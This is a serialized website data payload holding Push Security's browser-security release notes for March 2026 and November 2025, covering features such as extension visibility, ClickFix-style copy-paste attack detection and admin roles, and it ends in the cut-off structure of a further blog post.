Branding",{"data":27332,"marks":27333,"value":1350,"nodeType":883},{},[],{"data":27335,"content":27339,"nodeType":971},{"target":27336},{"sys":27337},{"id":27338,"type":976,"linkType":977},"3Jawd7IBSA3GF2XBHARsn",[],{"data":27341,"content":27342,"nodeType":879},{},[27343,27346,27355],{"data":27344,"marks":27345,"value":21,"nodeType":883},{},[],{"data":27347,"content":27351,"nodeType":18112},{"target":27348},{"sys":27349},{"id":27350,"type":976,"linkType":977},"4i1KWgBfYqtFYlUFRYiGdW",[27352],{"data":27353,"marks":27354,"value":18990,"nodeType":883},{},[],{"data":27356,"marks":27357,"value":21,"nodeType":883},{},[],{"data":27359,"content":27360,"nodeType":909},{},[27361],{"data":27362,"marks":27363,"value":27098,"nodeType":883},{},[],{"data":27365,"content":27366,"nodeType":879},{},[27367],{"data":27368,"marks":27369,"value":27370,"nodeType":883},{},[],"The Push browser extension can now collect additional metadata and store it locally for up to 30 days, powering more diverse and precise detections, including for emerging threats. ",{"data":27372,"content":27373,"nodeType":879},{},[27374,27378,27382,27386,27390],{"data":27375,"marks":27376,"value":27377,"nodeType":883},{},[],"Detections informed by this metadata will be raised on the ",{"data":27379,"marks":27380,"value":27134,"nodeType":883},{},[27381],{"type":916},{"data":27383,"marks":27384,"value":27385,"nodeType":883},{},[]," page. Note that these detections do not block end-user activity and are ",{"data":27387,"marks":27388,"value":4407,"nodeType":883},{},[27389],{"type":916},{"data":27391,"marks":27392,"value":27393,"nodeType":883},{},[]," mode only.",{"data":27395,"content":27396,"nodeType":879},{},[27397,27401,27406,27410,27415],{"data":27398,"marks":27399,"value":27400,"nodeType":883},{},[],"We recommend you enable ",{"data":27402,"marks":27403,"value":27405,"nodeType":883},{},[27404],{"type":916},"Browser event storage",{"data":27407,"marks":27408,"value":27409,"nodeType":883},{},[]," to take advantage of this capability. Go to ",{"data":27411,"marks":27412,"value":27414,"nodeType":883},{},[27413],{"type":916},"Settings > Telemetry > Browser event storage",{"data":27416,"marks":27417,"value":27418,"nodeType":883},{},[]," in the admin console.",{"data":27420,"content":27421,"nodeType":879},{},[27422,27425,27434],{"data":27423,"marks":27424,"value":21,"nodeType":883},{},[],{"data":27426,"content":27430,"nodeType":18112},{"target":27427},{"sys":27428},{"id":27429,"type":976,"linkType":977},"1x69JxXcDWEDIzYXUM8nGb",[27431],{"data":27432,"marks":27433,"value":18990,"nodeType":883},{},[],{"data":27435,"marks":27436,"value":21,"nodeType":883},{},[],{"data":27438,"content":27439,"nodeType":909},{},[27440],{"data":27441,"marks":27442,"value":27443,"nodeType":883},{},[],"And a few other things ...",{"data":27445,"content":27446,"nodeType":879},{},[27447],{"data":27448,"marks":27449,"value":27450,"nodeType":883},{},[],"Other new features or improvements to the platform include:",{"data":27452,"content":27453,"nodeType":1531},{},[27454,27474,27484,27504],{"data":27455,"content":27456,"nodeType":1535},{},[27457],{"data":27458,"content":27459,"nodeType":879},{},[27460,27464,27471],{"data":27461,"marks":27462,"value":27463,"nodeType":883},{},[],"You can now configure the frequency with which app banners will be displayed: either per-tab or per-browser. ",{"data":27465,"content":27467,"nodeType":940},{"uri":27466},"\u002Fhelp\u002F10125#frequency",[27468],{"data":27469,"marks":27470,"value":18990,"nodeType":883},{},[],{"data":27472,"marks":27473,"value":21,"nodeType":883},{},[],{"data":27475,"content":27476,"nodeType":1535},{},[27477],{"data":27478,"content":27479,"nodeType":879},{},[27480],{"data":27481,"marks":27482,"value":27483,"nodeType":883},{},[],"You can now define an Owner role as part of Push’s RBAC options. Only Owners can edit roles, delete your team (e.g. tenant), change default SAML roles, or update your team name.",{"data":27485,"content":27486,"nodeType":1535},{},[27487],{"data":27488,"content":27489,"nodeType":879},{},[27490,27494,27501],{"data":27491,"marks":27492,"value":27493,"nodeType":883},{},[],"Webhook events now include detection details, for greater context. ",{"data":27495,"content":27497,"nodeType":940},{"uri":27496},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002Faudience\u002Fengineering\u002Fwebhooks-v1\u002Fdetections",[27498],{"data":27499,"marks":27500,"value":18990,"nodeType":883},{},[],{"data":27502,"marks":27503,"value":21,"nodeType":883},{},[],{"data":27505,"content":27506,"nodeType":1535},{},[27507],{"data":27508,"content":27509,"nodeType":879},{},[27510,27514,27521],{"data":27511,"marks":27512,"value":27513,"nodeType":883},{},[],"Push now uses static IP addresses to emit webhook events. These IP addresses are in the same range we previously used, but if you wish to update your network filtering to these new, narrower IP addresses, you can. ",{"data":27515,"content":27517,"nodeType":940},{"uri":27516},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002Faudience\u002Fengineering\u002Fwebhooks-v1\u002Fsection\u002Fip-addresses",[27518],{"data":27519,"marks":27520,"value":18990,"nodeType":883},{},[],{"data":27522,"marks":27523,"value":21,"nodeType":883},{},[],{"data":27525,"content":27526,"nodeType":879},{},[27527],{"data":27528,"marks":27529,"value":21,"nodeType":883},{},[],{"entries":27531},{"inline":27532,"hyperlink":27533,"block":27554},[],[27534,27536,27538,27542,27544,27549],{"sys":27535,"__typename":26727,"title":26738,"slug":26739,"articleId":26740},{"id":26014},{"sys":27537,"__typename":26727,"title":26768,"slug":26769,"articleId":26770},{"id":26308},{"sys":27539,"__typename":1967,"title":27540,"slug":27541},{"id":27246},"Introducing malicious copy and paste detection","introducing-malicious-copy-paste-detection",{"sys":27543,"__typename":26727,"title":26743,"slug":26744,"articleId":26745},{"id":26035},{"sys":27545,"__typename":26727,"title":27546,"slug":27547,"articleId":27548},{"id":27350},"How do I add custom branding to Push banners and block pages?","how-do-i-add-custom-branding-to-push-banners-and-block-pages",10147,{"sys":27550,"__typename":26727,"title":27551,"slug":27552,"articleId":27553},{"id":27429},"How do I configure browser event storage?","how-do-i-configure-browser-event-storage",10146,[27555,27562,27569],{"sys":27556,"__typename":1765,"title":27557,"caption":59,"layoutMode":59,"file":27558},{"id":27159},"Malicious extension detection - Controls page - for release notes",{"url":27559,"width":27560,"height":27561},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2OhoXumfBK0saT2oLeCPrI\u002F95950149e4c7f11c53948ba0cf0b09b5\u002Fmalicious_ext_det_controls_pg.png",1337,767,{"sys":27563,"__typename":1765,"title":27564,"caption":59,"layoutMode":59,"file":27565},{"id":27210},"Browser extension block screen - KB 10138",{"url":27566,"width":27567,"height":27568},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3i6Sj2jgOimCqGtpKy1B7p\u002F3cc3e6b1e9f0b7c61565f3b3f7974844\u002Fextension_block_branded_20260420.png",2670,1626,{"sys":27570,"__typename":1765,"title":27571,"caption":27572,"layoutMode":59,"file":27573},{"id":27338},"Branded banner example - dark style - KB 10147","Example of a dark style mid-screen banner",{"url":27574,"width":27575,"height":27576},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FF8v8jKH2SXlMeHbG83Nvh\u002F2b7c51c8bbb2ad74947f4a2bcee3048b\u002Fmidscreen_dark_banner.png",2944,562,{"items":27578},[],{},"Push Security new product features for March 2026","release-notes","2026-03-10T00:00:00.000Z",{"items":27584},[27585],{"__typename":1967,"sys":27586,"content":27588,"title":28289,"synopsis":28290,"hashTags":59,"publishedDate":28291,"slug":28292,"tagsCollection":28293,"authorsCollection":28299},{"id":27587},"3ygDMHnTN58Lyb3W3k969w",{"json":27589},{"data":27590,"content":27591,"nodeType":875},{},[27592,27598,27670,27676,27683,27708,27732,27765,27771,27788,27794,27801,27808,27840,27846,27863,27869,27885,27892,27915,27922,27929,27952,27968,27974,27980,27987,28003,28010,28063,28070,28076,28094,28100,28115,28122,28145,28167,28173,28179,28283],{"data":27593,"content":27594,"nodeType":909},{},[27595],{"data":27596,"marks":27597,"value":27045,"nodeType":883},{},[],{"data":27599,"content":27600,"nodeType":1531},{},[27601,27611,27621,27631,27641,27651,27661],{"data":27602,"content":27603,"nodeType":1535},{},[27604],{"data":27605,"content":27606,"nodeType":879},{},[27607],{"data":27608,"marks":27609,"value":27610,"nodeType":883},{},[],"Get visibility for all installed browser extensions in your environment",{"data":27612,"content":27613,"nodeType":1535},{},[27614],{"data":27615,"content":27616,"nodeType":879},{},[27617],{"data":27618,"marks":27619,"value":27620,"nodeType":883},{},[],"New detection for ClickFix-style malicious copy-paste attacks",{"data":27622,"content":27623,"nodeType":1535},{},[27624],{"data":27625,"content":27626,"nodeType":879},{},[27627],{"data":27628,"marks":27629,"value":27630,"nodeType":883},{},[],"New Labs feature: Experimental detections",{"data":27632,"content":27633,"nodeType":1535},{},[27634],{"data":27635,"content":27636,"nodeType":879},{},[27637],{"data":27638,"marks":27639,"value":27640,"nodeType":883},{},[],"RBAC for the Push admin console",{"data":27642,"content":27643,"nodeType":1535},{},[27644],{"data":27645,"content":27646,"nodeType":879},{},[27647],{"data":27648,"marks":27649,"value":27650,"nodeType":883},{},[],"URLscan.io and domain registration enrichment for detections",{"data":27652,"content":27653,"nodeType":1535},{},[27654],{"data":27655,"content":27656,"nodeType":879},{},[27657],{"data":27658,"marks":27659,"value":27660,"nodeType":883},{},[],"Filter events by entities",{"data":27662,"content":27663,"nodeType":1535},{},[27664],{"data":27665,"content":27666,"nodeType":879},{},[27667],{"data":27668,"marks":27669,"value":27108,"nodeType":883},{},[],{"data":27671,"content":27672,"nodeType":909},{},[27673],{"data":27674,"marks":27675,"value":27610,"nodeType":883},{},[],{"data":27677,"content":27678,"nodeType":879},{},[27679],{"data":27680,"marks":27681,"value":27682,"nodeType":883},{},[],"You can now use Push to see other browser extensions installed on your employees’ browsers.",{"data":27684,"content":27685,"nodeType":879},{},[27686,27690,27695,27699,27704],{"data":27687,"marks":27688,"value":27689,"nodeType":883},{},[],"You can enable this feature by going to ",{"data":27691,"marks":27692,"value":27694,"nodeType":883},{},[27693],{"type":916},"Settings > Organization",{"data":27696,"marks":27697,"value":27698,"nodeType":883},{},[]," in the Push admin console and toggling on ",{"data":27700,"marks":27701,"value":27703,"nodeType":883},{},[27702],{"type":916},"Browser extension visibility",{"data":27705,"marks":27706,"value":27707,"nodeType":883},{},[],". There is no end-user impact when you enable this feature.",{"data":27709,"content":27710,"nodeType":879},{},[27711,27715,27719,27723,27728],{"data":27712,"marks":27713,"value":27714,"nodeType":883},{},[],"You’ll see browser extension data populate a new ",{"data":27716,"marks":27717,"value":289,"nodeType":883},{},[27718],{"type":916},{"data":27720,"marks":27721,"value":27722,"nodeType":883},{},[]," page in the admin console under ",{"data":27724,"marks":27725,"value":27727,"nodeType":883},{},[27726],{"type":916},"Investigate",{"data":27729,"marks":27730,"value":27731,"nodeType":883},{},[],". With this information, you can see:",{"data":27733,"content":27734,"nodeType":1531},{},[27735,27745,27755],{"data":27736,"content":27737,"nodeType":1535},{},[27738],{"data":27739,"content":27740,"nodeType":879},{},[27741],{"data":27742,"marks":27743,"value":27744,"nodeType":883},{},[],"Which extensions have been installed for each employee and browser.",{"data":27746,"content":27747,"nodeType":1535},{},[27748],{"data":27749,"content":27750,"nodeType":879},{},[27751],{"data":27752,"marks":27753,"value":27754,"nodeType":883},{},[],"How they were installed (e.g. by policy, manually, or sideloaded).",{"data":27756,"content":27757,"nodeType":1535},{},[27758],{"data":27759,"content":27760,"nodeType":879},{},[27761],{"data":27762,"marks":27763,"value":27764,"nodeType":883},{},[],"Which permissions they have.",{"data":27766,"content":27770,"nodeType":971},{"target":27767},{"sys":27768},{"id":27769,"type":976,"linkType":977},"5J5jdmwugy7yU8GGwxe7iH",[],{"data":27772,"content":27773,"nodeType":879},{},[27774,27777,27785],{"data":27775,"marks":27776,"value":21,"nodeType":883},{},[],{"data":27778,"content":27781,"nodeType":18112},{"target":27779},{"sys":27780},{"id":26308,"type":976,"linkType":977},[27782],{"data":27783,"marks":27784,"value":18990,"nodeType":883},{},[],{"data":27786,"marks":27787,"value":21,"nodeType":883},{},[],{"data":27789,"content":27790,"nodeType":909},{},[27791],{"data":27792,"marks":27793,"value":27620,"nodeType":883},{},[],{"data":27795,"content":27796,"nodeType":879},{},[27797],{"data":27798,"marks":27799,"value":27800,"nodeType":883},{},[],"Push can now detect malicious copy and paste attacks like ClickFix, FileFix, and other fake CAPTCHA-style techniques.",{"data":27802,"content":27803,"nodeType":879},{},[27804],{"data":27805,"marks":27806,"value":27807,"nodeType":883},{},[],"These techniques have become one of the most prevalent attack types this year, and rely on deceiving users into manually or automatically copying malicious code and running it locally.",{"data":27809,"content":27810,"nodeType":879},{},[27811,27815,27820,27824,27828,27832,27836],{"data":27812,"marks":27813,"value":27814,"nodeType":883},{},[],"You can enable ",{"data":27816,"marks":27817,"value":27819,"nodeType":883},{},[27818],{"type":916},"Malicious copy and paste detection",{"data":27821,"marks":27822,"value":27823,"nodeType":883},{},[]," from the ",{"data":27825,"marks":27826,"value":27150,"nodeType":883},{},[27827],{"type":916},{"data":27829,"marks":27830,"value":27831,"nodeType":883},{},[]," page of the Push admin console. Add a configuration rule to set the detection to ",{"data":27833,"marks":27834,"value":4407,"nodeType":883},{},[27835],{"type":916},{"data":27837,"marks":27838,"value":27839,"nodeType":883},{},[],". You can also add an exception for any staff who routinely handle malicious scripts, such as security team members, or add domains to the ignore list as needed.",{"data":27841,"content":27845,"nodeType":971},{"target":27842},{"sys":27843},{"id":27844,"type":976,"linkType":977},"2fPaiwRCAUd8lMvsVO03HZ",[],{"data":27847,"content":27848,"nodeType":879},{},[27849,27852,27860],{"data":27850,"marks":27851,"value":21,"nodeType":883},{},[],{"data":27853,"content":27856,"nodeType":18112},{"target":27854},{"sys":27855},{"id":27246,"type":976,"linkType":977},[27857],{"data":27858,"marks":27859,"value":18990,"nodeType":883},{},[],{"data":27861,"marks":27862,"value":21,"nodeType":883},{},[],{"data":27864,"content":27865,"nodeType":909},{},[27866],{"data":27867,"marks":27868,"value":27630,"nodeType":883},{},[],{"data":27870,"content":27871,"nodeType":879},{},[27872,27876,27881],{"data":27873,"marks":27874,"value":27875,"nodeType":883},{},[],"Get early access to new detections from the Push research team by enabling ",{"data":27877,"marks":27878,"value":27880,"nodeType":883},{},[27879],{"type":916},"Experimental detections",{"data":27882,"marks":27883,"value":27884,"nodeType":883},{},[],", a Labs feature.",{"data":27886,"content":27887,"nodeType":879},{},[27888],{"data":27889,"marks":27890,"value":27891,"nodeType":883},{},[],"Labs features are new features Push is testing before releasing them. Early access detections are designed to catch emerging attacker techniques, but may also produce more false positives while we finetune them. These early access detections do not block any user actions.",{"data":27893,"content":27894,"nodeType":879},{},[27895,27899,27903,27907,27912],{"data":27896,"marks":27897,"value":27898,"nodeType":883},{},[],"Enable ",{"data":27900,"marks":27901,"value":27880,"nodeType":883},{},[27902],{"type":916},{"data":27904,"marks":27905,"value":27906,"nodeType":883},{},[]," by going to ",{"data":27908,"marks":27909,"value":27911,"nodeType":883},{},[27910],{"type":916},"Settings > Labs",{"data":27913,"marks":27914,"value":27418,"nodeType":883},{},[],{"data":27916,"content":27917,"nodeType":909},{},[27918],{"data":27919,"marks":27920,"value":27921,"nodeType":883},{},[],"RBAC for the Push platform",{"data":27923,"content":27924,"nodeType":879},{},[27925],{"data":27926,"marks":27927,"value":27928,"nodeType":883},{},[],"You can now provide read-only access to the Push admin console to facilitate investigations, review detections, check app usage by department, help with employee offboarding — or anything else you need.",{"data":27930,"content":27931,"nodeType":879},{},[27932,27936,27940,27944,27949],{"data":27933,"marks":27934,"value":27935,"nodeType":883},{},[],"To add a read-only admin, go to ",{"data":27937,"marks":27938,"value":27694,"nodeType":883},{},[27939],{"type":916},{"data":27941,"marks":27942,"value":27943,"nodeType":883},{},[]," in the admin console. Enter the email address of the admin you want to invite and set the role to ",{"data":27945,"marks":27946,"value":27948,"nodeType":883},{},[27947],{"type":916},"Read only",{"data":27950,"marks":27951,"value":1350,"nodeType":883},{},[],{"data":27953,"content":27954,"nodeType":879},{},[27955,27959,27964],{"data":27956,"marks":27957,"value":27958,"nodeType":883},{},[],"Note that existing Push admins now have the role of ",{"data":27960,"marks":27961,"value":27963,"nodeType":883},{},[27962],{"type":916},"Full access",{"data":27965,"marks":27966,"value":27967,"nodeType":883},{},[],". You can adjust that role as needed from the Organization page, too.",{"data":27969,"content":27973,"nodeType":971},{"target":27970},{"sys":27971},{"id":27972,"type":976,"linkType":977},"7kraCfSP2YwdEEwZ8FxM1t",[],{"data":27975,"content":27976,"nodeType":909},{},[27977],{"data":27978,"marks":27979,"value":27650,"nodeType":883},{},[],{"data":27981,"content":27982,"nodeType":879},{},[27983],{"data":27984,"marks":27985,"value":27986,"nodeType":883},{},[],"You can now enrich detections in Push with information from urlscan.io, and see when the domain was first registered. This information gives you domain-relevant context to support investigations.",{"data":27988,"content":27989,"nodeType":879},{},[27990,27994,27999],{"data":27991,"marks":27992,"value":27993,"nodeType":883},{},[],"To enable this feature, go to ",{"data":27995,"marks":27996,"value":27998,"nodeType":883},{},[27997],{"type":916},"Settings > Advanced > Domain enrichment",{"data":28000,"marks":28001,"value":28002,"nodeType":883},{},[]," in the Push admin console or enable it from any existing detection event.",{"data":28004,"content":28005,"nodeType":879},{},[28006],{"data":28007,"marks":28008,"value":28009,"nodeType":883},{},[],"With this enrichment, you can quickly see:",{"data":28011,"content":28012,"nodeType":1531},{},[28013,28023,28033,28043,28053],{"data":28014,"content":28015,"nodeType":1535},{},[28016],{"data":28017,"content":28018,"nodeType":879},{},[28019],{"data":28020,"marks":28021,"value":28022,"nodeType":883},{},[],"The timestamp for when a domain was first registered",{"data":28024,"content":28025,"nodeType":1535},{},[28026],{"data":28027,"content":28028,"nodeType":879},{},[28029],{"data":28030,"marks":28031,"value":28032,"nodeType":883},{},[],"The number of times a domain was scanned on urlscan",{"data":28034,"content":28035,"nodeType":1535},{},[28036],{"data":28037,"content":28038,"nodeType":879},{},[28039],{"data":28040,"marks":28041,"value":28042,"nodeType":883},{},[],"The first time a domain was scanned",{"data":28044,"content":28045,"nodeType":1535},{},[28046],{"data":28047,"content":28048,"nodeType":879},{},[28049],{"data":28050,"marks":28051,"value":28052,"nodeType":883},{},[],"The last time a domain or IP was scanned",{"data":28054,"content":28055,"nodeType":1535},{},[28056],{"data":28057,"content":28058,"nodeType":879},{},[28059],{"data":28060,"marks":28061,"value":28062,"nodeType":883},{},[],"A urlscan verdict (e.g. “potentially malicious”)",{"data":28064,"content":28065,"nodeType":879},{},[28066],{"data":28067,"marks":28068,"value":28069,"nodeType":883},{},[],"You’ll see the enrichment data on the details slideout for an individual detection.",{"data":28071,"content":28075,"nodeType":971},{"target":28072},{"sys":28073},{"id":28074,"type":976,"linkType":977},"563fJFSgoLDOwSXSQ9Y0MM",[],{"data":28077,"content":28078,"nodeType":879},{},[28079,28082,28091],{"data":28080,"marks":28081,"value":21,"nodeType":883},{},[],{"data":28083,"content":28087,"nodeType":18112},{"target":28084},{"sys":28085},{"id":28086,"type":976,"linkType":977},"19qsIXEG6EN9EK0VRH3pw9",[28088],{"data":28089,"marks":28090,"value":18990,"nodeType":883},{},[],{"data":28092,"marks":28093,"value":21,"nodeType":883},{},[],{"data":28095,"content":28096,"nodeType":909},{},[28097],{"data":28098,"marks":28099,"value":27660,"nodeType":883},{},[],{"data":28101,"content":28102,"nodeType":879},{},[28103,28107,28111],{"data":28104,"marks":28105,"value":28106,"nodeType":883},{},[],"You can now filter the ",{"data":28108,"marks":28109,"value":26538,"nodeType":883},{},[28110],{"type":916},{"data":28112,"marks":28113,"value":28114,"nodeType":883},{},[]," page in the Push admin console by entities such as employees and apps to make triage more efficient.",{"data":28116,"content":28117,"nodeType":879},{},[28118],{"data":28119,"marks":28120,"value":28121,"nodeType":883},{},[],"With this option, you can do quick searches such as:",{"data":28123,"content":28124,"nodeType":1531},{},[28125,28135],{"data":28126,"content":28127,"nodeType":1535},{},[28128],{"data":28129,"content":28130,"nodeType":879},{},[28131],{"data":28132,"marks":28133,"value":28134,"nodeType":883},{},[],"See all recent events associated with an employee",{"data":28136,"content":28137,"nodeType":1535},{},[28138],{"data":28139,"content":28140,"nodeType":879},{},[28141],{"data":28142,"marks":28143,"value":28144,"nodeType":883},{},[],"See all recent logins for a given app",{"data":28146,"content":28147,"nodeType":879},{},[28148,28151,28155,28159,28164],{"data":28149,"marks":28150,"value":26602,"nodeType":883},{},[],{"data":28152,"marks":28153,"value":26538,"nodeType":883},{},[28154],{"type":916},{"data":28156,"marks":28157,"value":28158,"nodeType":883},{},[]," page, go to ",{"data":28160,"marks":28161,"value":28163,"nodeType":883},{},[28162],{"type":916},"Filters > Entity type",{"data":28165,"marks":28166,"value":1350,"nodeType":883},{},[],{"data":28168,"content":28169,"nodeType":909},{},[28170],{"data":28171,"marks":28172,"value":27108,"nodeType":883},{},[],{"data":28174,"content":28175,"nodeType":879},{},[28176],{"data":28177,"marks":28178,"value":27450,"nodeType":883},{},[],{"data":28180,"content":28181,"nodeType":1531},{},[28182,28219,28241,28251,28273],{"data":28183,"content":28184,"nodeType":1535},{},[28185],{"data":28186,"content":28187,"nodeType":879},{},[28188,28192,28202,28205,28215],{"data":28189,"marks":28190,"value":28191,"nodeType":883},{},[],"You can now configure exceptions for ",{"data":28193,"content":28197,"nodeType":18112},{"target":28194},{"sys":28195},{"id":28196,"type":976,"linkType":977},"4oOTN6FXPpZg9MLgQUujys",[28198],{"data":28199,"marks":28200,"value":28201,"nodeType":883},{},[],"MFA findings",{"data":28203,"marks":28204,"value":3983,"nodeType":883},{},[],{"data":28206,"content":28210,"nodeType":18112},{"target":28207},{"sys":28208},{"id":28209,"type":976,"linkType":977},"2eOzRGosD2Ghaipao7NY8W",[28211],{"data":28212,"marks":28213,"value":28214,"nodeType":883},{},[],"reused password",{"data":28216,"marks":28217,"value":28218,"nodeType":883},{},[]," findings. This is useful if you purposefully reuse passwords between systems or enforce MFA through a third-party provider.",{"data":28220,"content":28221,"nodeType":1535},{},[28222],{"data":28223,"content":28224,"nodeType":879},{},[28225,28229,28238],{"data":28226,"marks":28227,"value":28228,"nodeType":883},{},[],"We’ve added several first-class SIEM integrations. ",{"data":28230,"content":28234,"nodeType":18112},{"target":28231},{"sys":28232},{"id":28233,"type":976,"linkType":977},"2M73i6A90S9MY6Pe8uVjVv",[28235],{"data":28236,"marks":28237,"value":18990,"nodeType":883},{},[],{"data":28239,"marks":28240,"value":1350,"nodeType":883},{},[],{"data":28242,"content":28243,"nodeType":1535},{},[28244],{"data":28245,"content":28246,"nodeType":879},{},[28247],{"data":28248,"marks":28249,"value":28250,"nodeType":883},{},[],"We’ve expanded the limit for URLs you can block using the URL blocking control to 2,000.",{"data":28252,"content":28253,"nodeType":1535},{},[28254],{"data":28255,"content":28256,"nodeType":879},{},[28257,28261,28270],{"data":28258,"marks":28259,"value":28260,"nodeType":883},{},[],"You can now set a time period after which to automatically un-license inactive employees, to make license management easier. ",{"data":28262,"content":28266,"nodeType":18112},{"target":28263},{"sys":28264},{"id":28265,"type":976,"linkType":977},"6Ad43w7Cjz2L5fZN2klIOn",[28267],{"data":28268,"marks":28269,"value":18990,"nodeType":883},{},[],{"data":28271,"marks":28272,"value":1350,"nodeType":883},{},[],{"data":28274,"content":28275,"nodeType":1535},{},[28276],{"data":28277,"content":28278,"nodeType":879},{},[28279],{"data":28280,"marks":28281,"value":28282,"nodeType":883},{},[],"Push now supports Prisma Access browser.\n",{"data":28284,"content":28285,"nodeType":879},{},[28286],{"data":28287,"marks":28288,"value":21,"nodeType":883},{},[],"Product release: November 2025","Here’s what’s new on the Push platform for November 2025.","2025-11-04T00:00:00.000Z","product-release-november-2025",{"items":28294},[28295],{"sys":28296,"name":28298},{"id":28297},"5jk0kqjSdSK2L0YiistQjY","Release notes",{"items":28300},[28301],{"fullName":27030,"firstName":27031,"jobTitle":27032,"profilePicture":28302},{"url":27034},"product-release-march-2026","blog\u002Fproduct-release-march-2026",{"json":28306},{"data":28307,"content":28308,"nodeType":875},{},[28309],{"data":28310,"content":28311,"nodeType":879},{},[28312],{"data":28313,"marks":28314,"value":28315,"nodeType":883},{},[],"Malicious extension detection, block ClickFix-style attacks, custom branding and more","Here’s what’s new on the Push platform for March 2026.",{"id":28318,"publishedAt":28319},"3Yw48rVLntipUijLR0CYf2","2026-08-13T09:35:00.930Z",{"items":28321},[28322],{"sys":28323,"name":28298},{"id":28297},{"items":28325},[28326,28328,28330,28332],{"sys":28327,"name":298,"slug":299,"tier":31},{"id":295},{"sys":28329,"name":289,"slug":290,"tier":45},{"id":286},{"sys":28331,"name":316,"slug":317,"tier":45},{"id":313},{"sys":28333,"name":450,"slug":451,"tier":45},{"id":447},"eIqymJShskbNuC00g5SpN2S_4nuP1K1uJN6I7pLSXb4",{"id":28336,"title":10711,"authorsCollection":28337,"content":28343,"extension":228,"faqItemsCollection":29435,"faqTitle":59,"featured":6,"hashTags":59,"meta":29437,"metaTitle":29438,"ogImage":59,"postType":8981,"publishedDate":10713,"relatedBlogPostsCollection":29439,"slug":10714,"stem":31491,"subtitle":59,"summary":31492,"synopsis":10712,"sys":31503,"tagsCollection":31505,"topicsCollection":31511,"__hash__":31537},"blog\u002Fblog\u002Finstallfix.json",{"items":28338},[28339],{"fullName":10724,"firstName":10725,"jobTitle":10726,"socialLinks":28340,"profilePicture":28342},[28341],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fjacques-louw-o-62608594\u002F",{"url":10728},{"json":28344,"links":29230},{"data":28345,"content":28346,"nodeType":875},{},[28347,28352,28358,28364,28371,28384,28389,28392,28399,28405,28411,28417,28423,28429,28435,28441,28447,28452,28457,28463,28468,28474,28480,28485,28490,28495,28500,28516,28526,28532,28537,28543,28549,28579,28585,28592,28598,28603,28609,28614,28620,28636,28642,28645,28652,28658,28741,28747,28752,28755,28762,28768,28774,28780,28816,28819,28826,28842,28848,28855,29047,29054,29084,29091,29098,29104,29111,29117,29124,29134,29141,29147,29154,29164,29171,29178,29185,29192,29199,29206,29216,29223],{"data":28348,"content":28351,"nodeType":971},{"target":28349},{"sys":28350},{"id":9717,"type":976,"linkType":977},[],{"data":28353,"content":28354,"nodeType":879},{},[28355],{"data":28356,"marks":28357,"value":9725,"nodeType":883},{},[],{"data":28359,"content":28360,"nodeType":879},{},[28361],{"data":28362,"marks":28363,"value":9732,"nodeType":883},{},[],{"data":28365,"content":28366,"nodeType":879},{},[28367],{"data":28368,"marks":28369,"value":9740,"nodeType":883},{},[28370],{"type":916},{"data":28372,"content":28373,"nodeType":879},{},[28374,28377,28381],{"data":28375,"marks":28376,"value":9747,"nodeType":883},{},[],{"data":28378,"marks":28379,"value":1826,"nodeType":883},{},[28380],{"type":916},{"data":28382,"marks":28383,"value":9755,"nodeType":883},{},[],{"data":28385,"content":28388,"nodeType":971},{"target":28386},{"sys":28387},{"id":9760,"type":976,"linkType":977},[],{"data":28390,"content":28391,"nodeType":905},{},[],{"data":28393,"content":28394,"nodeType":909},{},[28395],{"data":28396,"marks":28397,"value":9772,"nodeType":883},{},[28398],{"type":916},{"data":28400,"content":28401,"nodeType":879},{},[28402],{"data":28403,"marks":28404,"value":9779,"nodeType":883},{},[],{"data":28406,"content":28407,"nodeType":879},{},[28408],{"data":28409,"marks":28410,"value":9786,"nodeType":883},{},[],{"data":28412,"content":28413,"nodeType":1036},{},[28414],{"data":28415,"marks":28416,"value":9793,"nodeType":883},{},[],{"data":28418,"content":28419,"nodeType":879},{},[28420],{"data":28421,"marks":28422,"value":9800,"nodeType":883},{},[],{"data":28424,"content":28425,"nodeType":879},{},[28426],{"data":28427,"marks":28428,"value":9807,"nodeType":883},{},[],{"data":28430,"content":28431,"nodeType":879},{},[28432],{"data":28433,"marks":28434,"value":9814,"nodeType":883},{},[],{"data":28436,"content":28437,"nodeType":879},{},[28438],{"data":28439,"marks":28440,"value":9821,"nodeType":883},{},[],{"data":28442,"content":28443,"nodeType":879},{},[28444],{"data":28445,"marks":28446,"value":9828,"nodeType":883},{},[],{"data":28448,"content":28451,"nodeType":971},{"target":28449},{"sys":28450},{"id":9833,"type":976,"linkType":977},[],{"data":28453,"content":28456,"nodeType":971},{"target":28454},{"sys":28455},{"id":9839,"type":976,"linkType":977},[],{"data":28458,"content":28459,"nodeType":879},{},[28460],{"data":28461,"marks":28462,"value":9847,"nodeType":883},{},[],{"data":28464,"content":28467,"nodeType":971},{"target":28465},{"sys":28466},{"id":9852,"type":976,"linkType":977},[],{"data":28469,"content":28470,"nodeType":1036},{},[28471],{"data":28472,"marks":28473,"value":9860,"nodeType":883},{},[],{"data":28475,"content":28476,"nodeType":879},{},[28477],{"data":28478,"marks":28479,"value":9867,"nodeType":883},{},[],{"data":28481,"content":28484,"nodeType":971},{"target":28482},{"sys":28483},{"id":9872,"type":976,"linkType":977},[],{"data":28486,"content":28489,"nodeType":971},{"target":28487},{"sys":28488},{"id":9878,"type":976,"linkType":977},[],{"data":28491,"content":28494,"nodeType":971},{"target":28492},{"sys":28493},{"id":9884,"type":976,"linkType":977},[],{"data":28496,"content":28499,"nodeType":971},{"target":28497},{"sys":28498},{"id":9890,"type":976,"linkType":977},[],{"data":28501,"content":28502,"nodeType":879},{},[28503,28506,28513],{"data":28504,"marks":28505,"value":9898,"nodeType":883},{},[],{"data":28507,"content":28508,"nodeType":940},{"uri":8965},[28509],{"data":28510,"marks":28511,"value":9906,"nodeType":883},{},[28512],{"type":948},{"data":28514,"marks":28515,"value":9910,"nodeType":883},{},[],{"data":28517,"content":28518,"nodeType":879},{},[28519,28523],{"data":28520,"marks":28521,"value":9918,"nodeType":883},{},[28522],{"type":916},{"data":28524,"marks":28525,"value":9922,"nodeType":883},{},[],{"data":28527,"content":28528,"nodeType":879},{},[28529],{"data":28530,"marks":28531,"value":9929,"nodeType":883},{},[],{"data":28533,"content":28536,"nodeType":971},{"target":28534},{"sys":28535},{"id":9934,"type":976,"linkType":977},[],{"data"